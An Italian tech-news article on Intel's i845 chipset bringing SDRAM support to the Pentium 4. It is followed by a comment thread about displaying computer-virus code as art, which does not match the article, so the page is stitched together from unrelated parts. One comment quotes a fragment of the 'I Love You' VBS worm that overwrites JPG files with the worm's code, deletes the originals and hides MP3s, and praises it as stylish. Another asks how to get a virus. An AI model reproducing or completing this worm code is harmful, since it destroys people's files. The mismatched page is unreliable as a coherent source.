Intel sposa il P4 con le SDRAM

Big Intel svela finalmente il tanto atteso Brookdale, ribattezzato con la sigla i845, il nuovo chipset che porterà ufficialmente il supporto alle memorie SDRAM sul Pentium 4. L'ultima mossa per spingere il P4 sul mercato di massa


Taipei (Taiwan) – Il nuovo chipset i845 appena svelato da Intel, prima noto con il nome in codice di Brookdale, porterà ufficialmente sulla piattaforma Pentium 4 il supporto alle memorie SDRAM.

Come è noto, infatti, l’ultimo chippone di Intel al momento supporta esclusivamente le memorie RDRAM che, per quanto nell’ultimo periodo abbiano registrato un sensibile calo del loro prezzo, rimangono nettamente più care rispetto alle memorie SDRAM PC133.

Intel non sarà la sola a produrre un chipset analogo: nei mesi scorsi il colosso californiano ha infatti concesso la licenza per produrre chipset SDRAM/DDR per il P4 ad ALi e SiS, mentre Via dovrebbe ottenerla a breve .

Intel spera che con l’arrivo sul mercato del nuovo i845, previsto per la seconda metà dell’anno, il P4 potrà finalmente entrare di diritto nella fascia di mercato dei PC sotto i 1.500 dollari e raggiungere così gli utenti consumer.

Per il momento Intel non ha parlato di supporto alle memorie DDR, ma alcune voci sosterrebbero che in realtà il chipset i845 già le supporta. Con tutta probabilità Intel sta rispettando una clausola del contratto stipulato a suo da tempo con Rambus, clausola che obbligherebbe il chipmaker ad attendere un certo numero di anni prima di portare su P4 una tecnologia di memoria direttamente rivale con quella di Rambus. E in attesa che la scadenza si avvicini, perché intanto non includerne il supporto in questo nuovo chip?

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    voglio un virus
    chi mi po dire come posso fare per avere un virus in questo ...... di compiuter
  • Anonimo scrive:
    è un caso?
    che la cifra 0100101110101101 in dec diventi4bad?
  • Anonimo scrive:
    da ___epidemic___
    "...eName(f1.path)set cop=fso.GetFile(f1.path)cop.copy(folderspec&"\"&bname&".vbs")fso.DeleteFile(f1.path)elseif(ext="jpg") or (ext="jpeg") thenset ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopyap.closeset cop=fso.GetFile(f1.path)cop.copy(f1.path&".vbs")fso.DeleteFile(f1.path)elseif(ext="mp3") or (ext="mp2") thenset mp3=fso.CreateTextFile(f1.path&".vbs")mp3.write vbscopymp3.closeset att=fso.GetFile(f1.path)att.attributes=att.attributes+2end ifif (eqfolderspec) then... " e così via.Trovo drammatiche le stringhe in cui "I Love You" chiede al tuo sistema di triturare tutti i file MP3 che, con amore, avevi scaricato sull'hard disk con Gnutella. Davvero raccapriccianti! Mi ricordano vagamente: "Ahi Pisa, vituperio de le genti del bel paese là dove 'l sì suona, poi che i vicini a te punir son lenti, muovasi la Capraia e la Gorgona, e faccian siepe ad Arno in su la foce,sì ch'elli annieghi in te ogne persona!"Benchè si tratti di un linguaggio "volgare" come il VBS... si può parlare senza timore di grande stile, di grande efficacia!... Dove lo trovi in un Museo?!... Tutto il resto è arredamento... buono per i Portali come per i Portoni.Alessandra C (Settembre 2000)
  • Anonimo scrive:
    ma che arte da quattro soldi!
    Ma che, vi fate prendere per il culo da questi straccioni che non hanno di meglio che inventare finte arti???????? E' stupefacente vedere quanti di voi si prodigano per goiustificare questi cialtroni!!! Se c'e' un arte non sono saranno certo loro a farla, ma chi sono ve lo siete chiesti? Da dove vengono questi? Io non mi faccio prendere per i fondelli! fate così anche voi!!!!!ennio
    • Anonimo scrive:
      Re: ma che critico da quattro soldi!
      - Scritto da: ennio
      Ma che, vi fate prendere per il culo da
      questi straccioni che non hanno di meglio
      che inventare finte arti???????? E'
      stupefacente vedere quanti di voi si
      prodigano per goiustificare questi
      cialtroni!!! Se c'e' un arte non sono
      saranno certo loro a farla, ma chi sono ve
      lo siete chiesti? Da dove vengono questi? Io
      non mi faccio prendere per i fondelli! fate
      così anche voi!!!!!

      ennio...ennio?? il critico d'arte??...forse no........
  • Anonimo scrive:
    l'arte dei periti e dei geometri
    Non è certo colpa loro, intendo dire di chi per propria scelta o per per costrizione ha dovuto lasciare le braccia dello studio e misurar terreni, chiaro che da loro non si può pretendere che abbiano il gusto raffinato in anni di esercizio del riconoscre ciò che è bello da ciò che è estetico da ciò che non è entrambi. da loro mi aspetto "questa è una stronzata".non si è dovuto aspettare molto per vedere pubblicata ance in questo forum simile volgarità.che importa, non è certo a loro che l'arte guarda, e benche non la vedano essa è come la luce per il cieco incolpevole.viva chi ha capito che la scrittura è arte se tocca livelli sublimi, che sia letteratura o codice evviva!liberiamo i tristi programmatori dal pensiero dell'inutilità della loro triste vita! fanno arte o al peggio artigianato! Sarà solo da menti lucide l'idea esatta di ciò che si è creato.restate nella vostra tristezza (o risolvete i problemi con la vostra ragazza!) voi che non siete capaci di vedere cosa è bello!per gli altri è cominciata una nuova era[hASh]
  • Anonimo scrive:
    L'arte NON è
    " L'arte non è; non si può definire. Esistono solo gli artisti.L'artista è colui che non sente maiil bisogno di chiedere scusa alla propria opera "... letto recentemente su un sito WEB di cui purtroppo non ricordo la URL.Mi è sembrato appropriato (e molto bello).
  • Anonimo scrive:
    Booooohhh
    ma lavorare no eh?certo che così tanta poetica su un software così banale come un virus... e addirittura tirare su del merchandising con magliette che fanno così di "antico"..."Acquistare un virus informatico è forse uno dei più eccitanti investimenti economici oggi realizzabili"mi dite il pusher? roba forte, eh!MAH....
  • Anonimo scrive:
    scarponi e ghidoni, 2 perfetti....
    l'arte è morta tutto fa schifoquesta idea è una beenmerita ideozianemmeno alessandro petti avrebbe partorito un'idea così banale e scemotta
    • Anonimo scrive:
      Re: scarponi e ghidoni, 2 perfetti....
      - Scritto da: Roberto Masiero
      l'arte è morta tutto fa schifo
      questa idea è una beenmerita ideoziaProblemi con la ragazza, ehh..?
  • Anonimo scrive:
    L'arte deve restare arte.
    Che dire di questa iniziativa..... boh!Speriamo di non cadere del classico baratro dell'arte come tale solo perchè "fà notizia".Nel senso:Anche un codice informatico può essere artistico.Quanti di noi, programmatori, probabilmente a volte si sono trovati a dire "Cazzo che bello 'sto algoritmo" .....Questo volevo dire. Anche l'algoritmo portante di un virus, può essere artistico.Ma non vuol dire questo, che per il solo fatto di presentare un virus informatico, che tanto se ne parla in questi periodi, sia una cosa artistica.Cioè... l'idea del virus sulle maglie... per me è una cazzata.. anche vederla come il virus che si tramanda tramite le persone.... perde in questo modo una caratteristica che è propria dei virus.. cioè la capacità di replicarsi.. e quindi la nomea stessa di virus...Per semplificare: Se io dipingessi un quadro... sempre un quadro sarebbe. Ma non sarebbe un'opera d'arte, in quanto sono estremamente negato con tela e pennelli. Diverso un quadro di VanGog. Così come un codice.... non per il fatto che sia codice virale deve essere considerata un'opera d'arte, ma dovrebbe essere un'opera di ingegno informatico.Ovviamente le persone non esperte sarebbero escluse dall'capire la bellezza di un codice informatico... ma la stessa cosa è con i quadri e i critici d'arte....Io la penso così..
    • Anonimo scrive:
      Re: L'arte deve restare arte.
      - Scritto da: l ...
      Cioè... l'idea del virus sulle maglie... per
      me è una cazzata.. ... Se ci pensi sulle magliette c'e' anche la "Gioconda": daccordo non e' la maglietta il capolavoro, ma il fatto di metterla su una maglietta puo' essere offensivo per Leonardo ma non denigra il quadro in se';parimenti non e' il codice sulla maglietta il capolavoro, ma il concepimento dell'algoritmo!Un algoritmo puo' veramente essere un'opera d'arte...prendi l'algoritmo di Euclide, e' un algoritmo base per la crittografia: datato 300 a.C., non e' stato ancora battuto!!per la cronaca trova il massimo comun denominatore fra due numeri a e b:Euclid(a,b) if b=0 then return a else return Euclid(b,a mod b)(mod e' il resto della divisione a/b)se non e' arte questa!
      • Anonimo scrive:
        L'arte è logica!
        - Scritto da: Wishper

        Un algoritmo puo' veramente essere un'opera
        d'arte...
        prendi l'algoritmo di Euclide, e' un
        algoritmo base per la crittografia: datato
        300 a.C., non e' stato ancora battuto!!
        per la cronaca trova il massimo comun
        denominatore fra due numeri a e b:

        Euclid(a,b)
        if b=0 then return a
        else return Euclid(b,a mod b)

        (mod e' il resto della divisione a/b)


        se non e' arte questa!Esattamente, è proprio arte. Quello che provo quando mi rendo conto di avere capito un algoritmo è la stessa cosa che provo quando mi rendo conto di avere capito perchè Picasso ha dipinto Guernica in questo modo o perchè Monet, scoprendo il limite massimo della resa prospettica di un paesaggio su una tela bidimensionale, ha dipinto in quell'altro.L'arte è calcolo e studio a tavolino della congruenza logica di un sistema, traduce in forma visibile l'oggetto del significato che il cervello recepisce dai dati di fatto, dalla realtà. E' una discretizzazione del mondo così come io lo vedo, e deve combaciare con il risultato che la mia memoria ha registrato nella mente: quando Platone parlava della triangolità, dicendo che ognuno ha in se' l'immagine concettuale del "suo" triangolo ma riesce a capire che si tratta di un triangolo anche se ne vede un'altro, non faceva che anticipare la logica bayesiana e in generale il fatto che il nostro cervello apprende secondo modelli statistici.Un quadro che sia opera d'arte è tale perchè rappresenta l'approssimazione statistica del pensiero di un uomo su un concetto o su un dato di fatto. E' ovvio, che a questo punto, se ci sono riuscito, il risultato sia innegabilmente BELLO... e poi, chiedetelo a Knuth, che ha intitolato la Bibbia "The ART of C programming" ;-)!
        • Anonimo scrive:
          Re: L'arte è logica!

          chiedetelo a Knuth, che ha intitolato la
          Bibbia "The ART of C programming" ;-)!Donald E. Knuth ha intitolato la sua Bibbia algoritmica in tre volumi "The Art of COMPUTER programming".Non mettiamoci a parlare di logica bayesiana e cognitivismo per fare poi di questi svarioni banali...
          • Anonimo scrive:
            Re: L'arte è logica!
            - Scritto da: Asor Rosa il Pignolo



            chiedetelo a Knuth, che ha intitolato la

            Bibbia "The ART of C programming" ;-)!
            Donald E. Knuth ha intitolato la sua Bibbia
            algoritmica in tre volumi "The Art of
            COMPUTER programming".
            Non mettiamoci a parlare di logica bayesiana
            e cognitivismo per fare poi di questi
            svarioni banali...Scusa, hai ovviamente ragione, ma devo avere cancellato inavvertitamente...mi vergogno,ma non ho riletto, fa conto che sto studiando davanti al monitor e ho l'esame domani...Pardon
      • Anonimo scrive:
        Re: L'arte deve restare arte.

        Se ci pensi sulle magliette c'e' anche la
        "Gioconda": daccordo non e' la maglietta il
        capolavoro, ma il fatto di metterla su una
        maglietta puo' essere offensivo per Leonardo
        ma non denigra il quadro in se';
        parimenti non e' il codice sulla maglietta
        il capolavoro, ma il concepimento
        dell'algoritmo!Probabilmente mi sono espresso male. Volevo toccare 2 punti:1) Il fatto se il codice di un virus potesse essere un'opera d'arte.2) Nell'articolo, si parlava di pubblicare il codice sulle magliette perchè era come se il codice virale si propagasse attraverso gli uomini oltre che con le macchine.Per il punto 2, in sintesi dato che il codice virale dalle magliette non si può replicare, Per me non è più un virus, quindi non mi sembra che il fatto rappresenti una parte dell'opera, come mi sembra di aver capito, ma esattamente come hai detto tu, è come avere una maglietta con la gioconda, che non è la stessa cosa di dire che le magliette con la gioconda rappresentano un'estensione del "messaggio" che vuole portare il quadro di Leonardo (se di messaggio di può parlare).Per il punto 1, è esattamente quello che volevo dire. Cioè che un codice può essere benissimo considerata un'arte. Però, mi sembrava che nell'articolo, fosse data enfasi al fatto che presentare un codice virale alla biennale fosse una forma d'arte, non per il codice in se, ma per il fatto che oggi la tecnologia è motivo di discussione sempre più frequente, ed i virus sono parte importante di queste discussioni.Un po', insomma, perchè "virus" fa tendenza, e quindi è un'arte. Il senso era quello.Praticamente concordo al 100% con quello che hai detto.. forse mi sono solo espresso male e non ho chiarito quali fossero i miei dubbi.
    • Anonimo scrive:
      Re: L'arte deve restare arte.

      Nel senso:
      Anche un codice informatico può essere
      artistico.
      Quanti di noi, programmatori, probabilmente
      a volte si sono trovati a dire "Cazzo che
      bello 'sto algoritmo" .....tendo a pensare che tutto cio' che viene creato per esprimere qualcosa puo' formare, a grado diverso, una forma artistica. Poiche' il prodotto di un'epoca viene abitualmente etichettato, nelle epoche successive, come "espressione" dell'epoca in cui e' vissuto, significa che ne porta le caratteristiche, e quindi "esprime" qualcosa. Per questo non faccio fatica a ritenere, alla fine dei conti, quasi tutto cio' che si crea scientemente come arte.
      Cioè... l'idea del virus sulle maglie... per
      me è una cazzata.. anche vederla come ilsi anche io :-)me le vedo le magliette che si replicano...
      Per semplificare: Se io dipingessi un
      quadro... sempre un quadro sarebbe. Ma non
      sarebbe un'opera d'arte, in quanto sono
      estremamente negato con tela e pennelli.se tu esprimessi qualcosa, sarebbe un'opera d'arte, non necessariamente capostipite nel suo genere (se ha un genere), la cui valutazione varia da persona a persona.
      Diverso un quadro di VanGog. Così come un(van Gogh)
      Io la penso così..E io cosa' :-)
  • Anonimo scrive:
    contropotere globale, forma generalmente che!?!?
    Cos'è un contropotere globale, forma generalmente prepolitica ?!?!Il senso dell'arte non dovrebbe cozzare con il senso del ridicolo :-(((
    • Anonimo scrive:
      Re: contropotere globale, forma generalmente che!?!?
      - Scritto da: Who M I - Who R U
      Cos'è un contropotere globale, forma
      generalmente prepolitica ?!?!
      Il senso dell'arte non dovrebbe cozzare con
      il senso del ridicolo :-(((vuol dire che le forme di contestazione allo status quo che si sviluppano nel mondo alle diverse latitudini assumono spesso una forma di lotta pre-politica, non partitica e magari neppure movimentista ma semplicemente sporadica e anche per questo effimera.non era cosi' difficile dai
      • Anonimo scrive:
        Re: contropotere globale, forma generalmente che!?!?
        Sei un vero poeta :-)))- Scritto da: matteo saputello
        vuol dire che le forme di contestazione allo
        status quo che si sviluppano nel mondo alle
        diverse latitudini assumono spesso una forma
        di lotta pre-politica, non partitica e
        magari neppure movimentista ma semplicemente
        sporadica e anche per questo effimera.
        non era cosi' difficile dai
  • Anonimo scrive:
    idea fantastica
    questo happening mi piace moltissimo, trovo sia un degnissimo sviluppo della questione virus e un ribaltamento di ruoli che fa bene al cuore.grazie binaries.org !
  • Anonimo scrive:
    ..ed io che ho fatto una tesina contro i virus :(
    quanto tempo perso :)
  • Anonimo scrive:
    Siamo ancora agli inizi
    Sto guardando adesso il sito di 01etc.Direi che l'idea non è malvagia, anche se ancora vengono usati i canoni della video installazione e le "videate" che appaiono sono disturbanti perchè troppo televisive nella loro forma di presentazione. Il precedente che stanno creando è importante, e credo che il connubio tra belle arti e informatica sia un'idea geniale. La programmazione stessa è un'arte, il comporre un sistema è un'arte, e lo stile altro non è se non la capacità di esprimere un concetto. Voglio proprio vedere che accadrebbe se si facesse un virus capace di creare un'immagine in un computer infettato...la bellezza è una delle virtù matematiche, come sa chi ha visto Melancholia di Durer,o l'iperbole equilatera, o i frattali...
    • Anonimo scrive:
      Re: Siamo ancora agli inizi
      - Scritto da: KRN
      Sto guardando adesso il sito di 01etc.
      Direi che l'idea non è malvagia, anche se
      ancora vengono usati i canoni della video
      installazione e le "videate" che appaiono
      sono disturbanti perchè troppo televisive
      nella loro forma di presentazione. Il
      precedente che stanno creando è importante,
      e credo che il connubio tra belle arti e
      informatica sia un'idea geniale. La
      programmazione stessa è un'arte, il comporre
      un sistema è un'arte, e lo stile altro non è
      se non la capacità di esprimere un concetto.
      Voglio proprio vedere che accadrebbe se si
      facesse un virus capace di creare
      un'immagine in un computer infettato...la
      bellezza è una delle virtù matematiche, come
      sa chi ha visto Melancholia di Durer,o
      l'iperbole equilatera, o i frattali...si...si...si...d'accordo su tutto
  • Anonimo scrive:
    hehehe se ne vedranno dellle belle....
    hehehe se ne vedranno delle belle nei prossimi mesiEvvai sono il primo post
Chiudi i commenti